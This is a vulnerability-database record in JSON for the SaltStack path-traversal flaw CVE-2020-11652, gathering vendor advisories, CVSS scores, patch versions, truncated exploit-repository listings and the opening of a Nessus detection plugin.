An issue was discovered in SaltStack Salt before 2019.2.4 and 3000 before 3000.2. The salt-master process ClearFuncs class allows access to some methods that improperly sanitize paths. These methods allow arbitrary directory access to authenticated users.
{"ubuntucve": [{"lastseen": "2023-01-26T14:07:49", "description": "An issue was discovered in SaltStack Salt before 2019.2.4 and 3000 before\n3000.2. The salt-master process ClearFuncs class allows access to some\nmethods that improperly sanitize paths. These methods allow arbitrary\ndirectory access to authenticated users.\n\n#### Bugs\n\n * <https://bugs.launchpad.net/ubuntu/+source/salt-minion/+bug/1883658>\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "LOW", "baseScore": 6.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2020-04-30T00:00:00", "type": "ubuntucve", "title": "CVE-2020-11652", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 4.0, "vectorString": "AV:N/AC:L/Au:S/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-11652"], "modified": "2020-04-30T00:00:00", "id": "UB:CVE-2020-11652", "href": "https://ubuntu.com/security/CVE-2020-11652", "cvss": {"score": 4.0, "vector": "AV:N/AC:L/Au:S/C:P/I:N/A:N"}}], "cisa_kev": [{"lastseen": "2022-08-10T17:26:47", "description": "The salt-master process ClearFuncs class allows access to some methods that improperly sanitize paths. These methods allow arbitrary directory access to authenticated users.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "LOW", "baseScore": 6.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2021-11-03T00:00:00", "type": "cisa_kev", "title": "SaltStack directory traversal failure to sanitize untrusted input", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 4.0, "vectorString": "AV:N/AC:L/Au:S/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-11652"], "modified": "2021-11-03T00:00:00", "id": "CISA-KEV-CVE-2020-11652", "href": "", "cvss": {"score": 4.0, "vector": "AV:N/AC:L/Au:S/C:P/I:N/A:N"}}], "githubexploit": [{"lastseen": "2022-08-18T08:19:13", "description": "<!DOCTYPE html>\n<html dir=\"rtl\" lang=\"fa-IR\">\n\n<head>\n\t<meta cha...", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "LOW", "baseScore": 6.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2020-05-22T07:56:32", "type": "githubexploit", "title": "Exploit for Path Traversal in Saltstack Salt", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 4.0, "vectorString": "AV:N/AC:L/Au:S/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-11652"], "modified": "2020-05-22T08:34:26", "id": "89061482-5DE9-5936-88EA-B1E8F0B7B0AE", "href": "", "cvss": {"score": 4.0, "vector": "AV:N/AC:L/Au:S/C:P/I:N/A:N"}, "privateArea": 1}, {"lastseen": "2021-12-10T15:16:44", "description": "# Salt Stack Profile\n\nThis profile will check to make sure your ...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-05-01T03:23:01", "type": "githubexploit", "title": "Exploit for Missing Authentication for Critical Function in Saltstack Salt", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-11651", "CVE-2020-11652"], "modified": "2021-08-24T12:55:25", "id": "7B851B0A-5EBA-5ACB-ABCF-C10AB9BF13FA", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-03-23T00:07:27", "description": "Official patches for previous versions can be requested at: http...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-05-01T20:53:49", "type": "githubexploit", "title": "Exploit for Missing Authentication for Critical Function in Saltstack Salt", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-11651", "CVE-2020-11652"], "modified": "2022-03-22T21:58:18", "id": "CF83B6A1-3B69-5983-95FF-F4E961E0A478", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-01-12T03:20:31", "description": "# SaltStack-Exp\nCVE-2020-11651\nCVE-2020-11652\n\n#### Exec-Master:...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-12-25T02:58:35", "type": "githubexploit", "title": "Exploit for Path Traversal in Saltstack Salt", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-11652", "CVE-2020-11651"], "modified": "2022-01-09T23:42:55", "id": "C812A443-A73F-5431-9290-0A3742561103", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-02-17T07:25:46", "description": "# PoC exploit for CVE-2020-11651 and CVE-2020-11652\n\nThis is a p...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-05-04T11:52:28", "type": "githubexploit", "title": "Exploit for Missing Authentication for Critical Function in Saltstack Salt", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-11651", "CVE-2020-11652"], "modified": "2022-02-17T06:29:10", "id": "13EBE9CB-024E-5519-A3C1-40F087AD5B30", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2021-12-10T15:01:18", "description": "[1]\tWhat is it?\r\n\r\nScanning tool to test for SaltStack vulnerabi...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-11-30T09:23:23", "type": "githubexploit", "title": "Exploit for Missing Authentication for Critical Function in Saltstack Salt", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-11651", "CVE-2020-11652"], "modified": "2020-11-30T09:48:22", "id": "6C55D55F-AFB4-53DF-84E1-D121636CE0D8", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}], "debiancve": [{"lastseen": "2022-11-07T22:05:29", "description": "An issue was discovered in SaltStack Salt before 2019.2.4 and 3000 before 3000.2. The salt-master process ClearFuncs class allows access to some methods that improperly sanitize paths. These methods allow arbitrary directory access to authenticated users.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "LOW", "baseScore": 6.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2020-04-30T17:15:00", "type": "debiancve", "title": "CVE-2020-11652", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 4.0, "vectorString": "AV:N/AC:L/Au:S/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-11652"], "modified": "2020-04-30T17:15:00", "id": "DEBIANCVE:CVE-2020-11652", "href": "https://security-tracker.debian.org/tracker/CVE-2020-11652", "cvss": {"score": 4.0, "vector": "AV:N/AC:L/Au:S/C:P/I:N/A:N"}}], "osv": [{"lastseen": "2022-05-12T01:31:29", "description": "An issue was discovered in SaltStack Salt before 2019.2.4 and 3000 before 3000.2. The salt-master process ClearFuncs class allows access to some methods that improperly sanitize paths. These methods allow arbitrary directory access to authenticated users.", "edition": 1, "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "LOW", "baseScore": 6.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2020-04-30T17:15:00", "type": "osv", "title": "PYSEC-2020-103", "bulletinFamily": "software", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 4.0, "vectorString": "AV:N/AC:L/Au:S/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-11652"], "modified": "2020-08-20T01:17:00", "id": "OSV:PYSEC-2020-103", "href": "https://osv.dev/vulnerability/PYSEC-2020-103", "cvss": {"score": 4.0, "vector": "AV:N/AC:L/Au:S/C:P/I:N/A:N"}}, {"lastseen": "2022-08-05T05:18:50", "description": "\nSeveral vulnerabilities were discovered in package salt, a\nconfiguration management and infrastructure automation software.\n\n\n* [CVE-2020-11651](https://security-tracker.debian.org/tracker/CVE-2020-11651)\nThe salt-master process ClearFuncs class does not properly validate\n method calls. This allows a remote user to access some methods\n without authentication. These methods can be used to retrieve user\n tokens from the salt master and/or run arbitrary commands on salt\n minions.\n* [CVE-2020-11652](https://security-tracker.debian.org/tracker/CVE-2020-11652)\nThe salt-master process ClearFuncs class allows access to some\n methods that improperly sanitize paths. These methods allow\n arbitrary directory access to authenticated users.\n\n\nFor Debian 8 Jessie, these problems have been fixed in version\n2014.1.13+ds-3+deb8u1.\n\n\nWe recommend that you upgrade your salt packages.\n\n\nFurther information about Debian LTS security advisories, how to apply\nthese updates to your system and frequently asked questions can be\nfound at: <https://wiki.debian.org/LTS>\n\n\n", "edition": 1, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2020-05-30T00:00:00", "type": "osv", "title": "salt - security update", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-11652", "CVE-2020-11651"], "modified": "2022-08-05T05:18:47", "id": "OSV:DLA-2223-1", "href": "https://osv.dev/vulnerability/DLA-2223-1", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-08-10T07:15:43", "description": "\nSeveral vulnerabilities were discovered in salt, a powerful remote\nexecution manager, which could result in retrieve of user tokens from\nthe salt master, execution of arbitrary commands on salt minions,\narbitrary directory access to authenticated users or arbitrary code\nexecution on salt-api hosts.\n\n\nFor the oldstable distribution (stretch), these problems have been fixed\nin version 2016.11.2+ds-1+deb9u3.\n\n\nFor the stable distribution (buster), these problems have been fixed in\nversion 2018.3.4+dfsg1-6+deb10u1.\n\n\nWe recommend that you upgrade your salt packages.\n\n\nFor the detailed security status of salt please refer to its security\ntracker page at:\n[\\\nhttps://security-tracker.debian.org/tracker/salt](https://security-tracker.debian.org/tracker/salt)\n\n\n", "edition": 1, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2020-05-06T00:00:00", "type": "osv", "title": "salt - security update", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-11652", "CVE-2020-11651"], "modified": "2022-08-10T07:15:40", "id": "OSV:DSA-4676-2", "href": "https://osv.dev/vulnerability/DSA-4676-2", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-08-10T07:15:36", "description": "\nSeveral vulnerabilities were discovered in salt, a powerful remote\nexecution manager, which could result in retrieve of user tokens from\nthe salt master, execution of arbitrary commands on salt minions,\narbitrary directory access to authenticated users or arbitrary code\nexecution on salt-api hosts.\n\n\nFor the oldstable distribution (stretch), these problems have been fixed\nin version 2016.11.2+ds-1+deb9u3.\n\n\nFor the stable distribution (buster), these problems have been fixed in\nversion 2018.3.4+dfsg1-6+deb10u1.\n\n\nWe recommend that you upgrade your salt packages.\n\n\nFor the detailed security status of salt please refer to its security\ntracker page at:\n[\\\nhttps://security-tracker.debian.org/tracker/salt](https://security-tracker.debian.org/tracker/salt)\n\n\n", "edition": 1, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2020-05-06T00:00:00", "type": "osv", "title": "salt - security update", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-11652", "CVE-2020-11651", "CVE-2019-17361"], "modified": "2022-08-10T07:15:29", "id": "OSV:DSA-4676-1", "href": "https://osv.dev/vulnerability/DSA-4676-1", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "veracode": [{"lastseen": "2022-07-27T10:52:56", "description": "salt allows arbitrary directory access. The salt-master process in `ClearFuncs` class allows access to some methods that improperly sanitize paths and the methods allow authenticated users to access arbitrary directories.\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "LOW", "baseScore": 6.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2020-05-04T04:38:10", "type": "veracode", "title": "Arbitrary Directory Access", "bulletinFamily": "software", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 4.0, "vectorString": "AV:N/AC:L/Au:S/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-11652"], "modified": "2022-05-03T16:30:21", "id": "VERACODE:25154", "href": "https://sca.analysiscenter.veracode.com/vulnerability-database/security/1/1/sid-25154/summary", "cvss": {"score": 4.0, "vector": "AV:N/AC:L/Au:S/C:P/I:N/A:N"}}], "redhatcve": [{"lastseen": "2023-02-01T08:13:45", "description": "A flaw was found in salt. The salt-master process ClearFuncs class allows access to some methods that improperly sanitize paths. These methods allow arbitrary directory access to authenticated users.\n#### Mitigation\n\nMitigation for this issue is either not available or the currently available options do not meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base or stability. \n\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "LOW", "baseScore": 6.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2020-05-06T17:40:11", "type": "redhatcve", "title": "CVE-2020-11652", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 4.0, "vectorString": "AV:N/AC:L/Au:S/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-11652"], "modified": "2023-02-01T06:11:04", "id": "RH:CVE-2020-11652", "href": "https://access.redhat.com/security/cve/cve-2020-11652", "cvss": {"score": 4.0, "vector": "AV:N/AC:L/Au:S/C:P/I:N/A:N"}}], "nessus": [{"lastseen": "2023-01-11T15:12:56", "description": "Several vulnerabilities were discovered in package salt, a configuration management and infrastructure automation software.\n\nCVE-2020-11651\n\nThe salt-master process ClearFuncs class does not properly validate method calls. This allows a remote user to access some methods without authentication. These methods can be used to retrieve user tokens from the salt master and/or run arbitrary commands on salt minions.\n\nCVE-2020-11652\n\nThe salt-master process ClearFuncs class allows access to some methods that improperly sanitize paths. These methods allow arbitrary directory access to authenticated users.\n\nFor Debian 8 'Jessie', these problems have been fixed in version 2014.1.13+ds-3+deb8u1.\n\nWe recommend that you upgrade your salt packages.\n\nNOTE: Tenable Network Security has extracted the preceding description block directly from the DLA security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2020-06-01T00:00:00", "type": "nessus", "title": "Debian DLA-2223-1 : salt security update", "bulletinFamily": "scanner", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-11651", "CVE-2020-11652"], "modified": "2022-12-05T00:00:00", "cpe": ["p-cpe:/a:debian:debian_linux:salt-cloud", "p-cpe:/a:debian:debian_linux:salt-common", "p-cpe:/a:debian:debian_linux:salt-doc", "p-cpe:/a:debian:debian_linux:salt-master", "p-cpe:/a:debian:debian_linux:salt-minion", "p-cpe:/a:debian:debian_linux:salt-ssh", "p-cpe:/a:debian:debian_linux:salt-syndic", "cpe:/o:debian:debian_linux:8.0"], "id": "DEBIAN_DLA-2223.NASL", "href": "https://www.tenable.com/plugins/nessus/136979", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Debian Security Advisory DLA-2223-1. The text\n# itself is copyright (C) Software in the Public Interest, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(136979);\n script_version(\"1.10\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/12/05\");\n\n script_cve_id(\"CVE-2020-11651\", \"CVE-2020-11652\");\n script_xref(name:\"IAVA\", value:\"2020-A-0195-S\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/05/03\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2020-0041\");\n\n script_name(english:\"Debian DLA-2223-1 : salt security update\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Debian host is missing a security update.\");\n script_set_attribute(attribute:\"description\", value:\n\"Several vulnerabilities were discovered in package salt, a\nconfiguration management and infrastructure automation software.\n\nCVE-2020-11651\n\nThe salt-master process ClearFuncs class does not properly validate\nmethod calls. This allows a remote user to access some methods without\nauthentication. These methods can be used to retrieve user tokens from\nthe salt master and/or run arbitrary commands on salt minions.\n\nCVE-2020-11652\n\nThe salt-master process ClearFuncs class allows access to some methods\nthat improperly sanitize paths. These methods allow arbitrary\ndirectory access to authenticated users.\n\nFor Debian 8 'Jessie', these problems have been fixed in version\n2014.1.13+ds-3+deb8u1.\n\nWe recommend that you upgrade your salt packages.\n\nNOTE: Tenable Network Security has extracted the preceding description\nblock directly from the DLA security advisory. Tenable has attempted\nto automatically clean and format it as much as possible without\nintroducing additional issues.\");\n script_set_attribute(attribute:\"see_also\", 